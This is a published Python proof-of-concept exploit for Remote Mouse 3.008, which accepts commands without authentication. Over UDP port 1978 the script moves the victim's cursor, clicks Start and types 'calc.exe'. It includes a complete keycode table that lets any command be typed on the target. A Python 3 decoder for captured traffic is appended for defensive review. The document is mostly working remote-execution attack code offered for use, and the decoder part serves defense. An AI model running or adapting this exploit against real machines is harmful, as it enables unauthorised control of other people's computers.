#!/usr/bin/python2
# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10

# Remote Mouse 3.008 fails to check for authentication and will execute any command any machine gives it
# This script pops calc as proof of concept (albeit a bit slowly)
# It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself

from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv


def Ping(ip):
    # Connect to the TCP control port (1978); the server answers with a fixed banner
    # without asking for any credentials.
    try:
        target = socket(AF_INET, SOCK_STREAM)
        target.settimeout(5)
        target.connect((ip, 1978))
        response = target.recv(1048)
        target.close()
        if response == "SIN 15win nop nop 300":
            return True
        else:
            return False
    except Exception:
        print("ERROR: Request timed out")
        return False


def MoveMouse(x, y, ip):
    # Mouse events are plain-text UDP datagrams to port 1978; each "m dx dy"
    # datagram moves the cursor one step, so a move is repeated |x| or |y| times.
    def SendMouse(command, times, ip):
        for _ in range(times):
            target = socket(AF_INET, SOCK_DGRAM)
            target.sendto(command, (ip, 1978))
            sleep(0.001)

    if x > 0:
        command = "mos5m 1 0"
        SendMouse(command, x, ip)
    elif x < 0:
        x = x * -1
        # NOTE: the original uses the "mos5" prefix here but "mos6" for the -y
        # command below; both strings are kept exactly as written.
        command = "mos5m -1 0"
        SendMouse(command, x, ip)
    if y > 0:
        command = "mos5m 0 1"
        SendMouse(command, y, ip)
    elif y < 0:
        y = y * -1
        command = "mos6m 0 -1"
        SendMouse(command, y, ip)


def MousePress(command, ip, action="click"):
    # A button event is the button command followed by " d" (down) or " u" (up);
    # a click is a down immediately followed by an up.
    target = socket(AF_INET, SOCK_DGRAM)
    if action == "down":
        target.sendto(command + " d", (ip, 1978))
    elif action == "up":
        target.sendto(command + " u", (ip, 1978))
    elif action == "click":
        target.sendto(command + " d", (ip, 1978))
        target.sendto(command + " u", (ip, 1978))
    else:
        raise Exception('MousePress: No action named "' + str(action) + '"')


def SendString(string, ip):
    # Type a string one character at a time using the keycode index below.
    # Characters missing from the index raise KeyError.
    for char in string:
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto(characters[char], (ip, 1978))
        sleep(0.5)


class mouse:
    leftClick = "mos5R l"
    rightClick = "mos5R r"
    middleClick = "mos5R m"


# Index of the keycodes the app sends for each character
characters = {
    "A": "key8[ras]116", "B": "key8[ras]119", "C": "key8[ras]118", "D": "key8[ras]113",
    "E": "key8[ras]112", "F": "key8[ras]115", "G": "key8[ras]114", "H": "key8[ras]125",
    "I": "key8[ras]124", "J": "key8[ras]127", "K": "key8[ras]126", "L": "key8[ras]121",
    "M": "key8[ras]120", "N": "key8[ras]123", "O": "key8[ras]122", "P": "key8[ras]101",
    "Q": "key8[ras]100", "R": "key8[ras]103", "S": "key8[ras]102", "T": "key7[ras]97",
    "U": "key7[ras]96", "V": "key7[ras]99", "W": "key7[ras]98", "X": "key8[ras]109",
    "Y": "key8[ras]108", "Z": "key8[ras]111",
    "a": "key7[ras]84", "b": "key7[ras]87", "c": "key7[ras]86", "d": "key7[ras]81",
    "e": "key7[ras]80", "f": "key7[ras]83", "g": "key7[ras]82", "h": "key7[ras]93",
    "i": "key7[ras]92", "j": "key7[ras]95", "k": "key7[ras]94", "l": "key7[ras]89",
    "m": "key7[ras]88", "n": "key7[ras]91", "o": "key7[ras]90", "p": "key7[ras]69",
    "q": "key7[ras]68", "r": "key7[ras]71", "s": "key7[ras]70", "t": "key7[ras]65",
    "u": "key7[ras]64", "v": "key7[ras]67", "w": "key7[ras]66", "x": "key7[ras]77",
    "y": "key7[ras]76", "z": "key7[ras]79",
    "1": "key6[ras]4", "2": "key6[ras]7", "3": "key6[ras]6", "4": "key6[ras]1",
    "5": "key6[ras]0", "6": "key6[ras]3", "7": "key6[ras]2", "8": "key7[ras]13",
    "9": "key7[ras]12", "0": "key6[ras]5",
    "\n": "key3RTN", "\b": "key3BAS", " ": "key7[ras]21",
    "+": "key7[ras]30", "=": "key6[ras]8", "/": "key7[ras]26", "_": "key8[ras]106",
    "<": "key6[ras]9", ">": "key7[ras]11", "[": "key8[ras]110", "]": "key8[ras]104",
    "!": "key7[ras]20", "@": "key8[ras]117", "#": "key7[ras]22", "$": "key7[ras]17",
    "%": "key7[ras]16", "^": "key8[ras]107", "&": "key7[ras]19", "*": "key7[ras]31",
    "(": "key7[ras]29", ")": "key7[ras]28", "-": "key7[ras]24", "'": "key7[ras]18",
    '"': "key7[ras]23", ":": "key7[ras]15", ";": "key7[ras]14", "?": "key7[ras]10",
    "`": "key7[ras]85", "~": "key7[ras]75", "\\": "key8[ras]105", "|": "key7[ras]73",
    "{": "key7[ras]78", "}": "key7[ras]72", ",": "key7[ras]25", ".": "key7[ras]27",
}


def PopCalc(ip):
    # Drag the cursor to the bottom-left corner (Start button), click, type the
    # command and press Enter.
    MoveMouse(-5000, 3000, ip)
    MousePress(mouse.leftClick, ip)
    sleep(1)
    SendString("calc.exe", ip)
    sleep(1)
    SendString("\n", ip)
    print("SUCCESS! Process calc.exe has run on target " + ip)


def main():
    try:
        targetIP = argv[1]
    except IndexError:
        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
        exit()
    if Ping(targetIP) == True:
        PopCalc(targetIP)
    else:
        print("ERROR: Target machine is not running RemoteMouse")
        exit()


if __name__ == "__main__":
    main()
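Added example, not part of the original exploit: a Python 3 decoder that inverts a subset of the keycode index above so that a defender reviewing captured UDP/1978 traffic can turn the plain-text datagrams back into the mouse events and keystrokes they would produce on the host. The sample payloads are constructed to mirror what the PoC sends; the KEYCODES subset is copied from the page's index and is not the complete table.

```python
import re

# Subset of the page's keycode index (enough to decode the PoC's "calc.exe\n").
KEYCODES = {
    "key7[ras]86": "c", "key7[ras]84": "a", "key7[ras]89": "l",
    "key7[ras]80": "e", "key7[ras]27": ".", "key7[ras]77": "x",
    "key3RTN": "\n", "key3BAS": "\b", "key7[ras]21": " ",
}
MOUSE_MOVE = re.compile(r"^mos\d+m (-?\d+) (-?\d+)$")   # "mos5m 1 0"
MOUSE_BTN = re.compile(r"^mos\d+R ([lrm]) ([du])$")     # "mos5R l d"


def decode(payload: str) -> str:
    """Describe one datagram in human-readable form."""
    m = MOUSE_MOVE.match(payload)
    if m:
        return "mouse move dx=%s dy=%s" % (m.group(1), m.group(2))
    m = MOUSE_BTN.match(payload)
    if m:
        button = {"l": "left", "r": "right", "m": "middle"}[m.group(1)]
        return "mouse %s %s" % (button, "down" if m.group(2) == "d" else "up")
    if payload in KEYCODES:
        return "key %r" % KEYCODES[payload]
    return "unknown %r" % payload


def typed_text(payloads):
    """Reassemble the text a sequence of key datagrams would type on the host;
    a backspace datagram removes the previously typed character."""
    out = []
    for p in payloads:
        ch = KEYCODES.get(p)
        if ch is None:
            continue            # mouse events and unknown payloads type nothing
        if ch == "\b":
            if out:
                out.pop()
        else:
            out.append(ch)
    return "".join(out)


# Constructed sample: a move step, a left click, then "calc.exe" and Enter.
SAMPLE = ["mos5m -1 0", "mos5R l d", "mos5R l u",
          "key7[ras]86", "key7[ras]84", "key7[ras]89", "key7[ras]86",
          "key7[ras]27", "key7[ras]80", "key7[ras]77", "key7[ras]80", "key3RTN"]

if __name__ == "__main__":
    for p in SAMPLE:
        print(decode(p))
    print("typed:", repr(typed_text(SAMPLE)))   # typed: 'calc.exe\n'
```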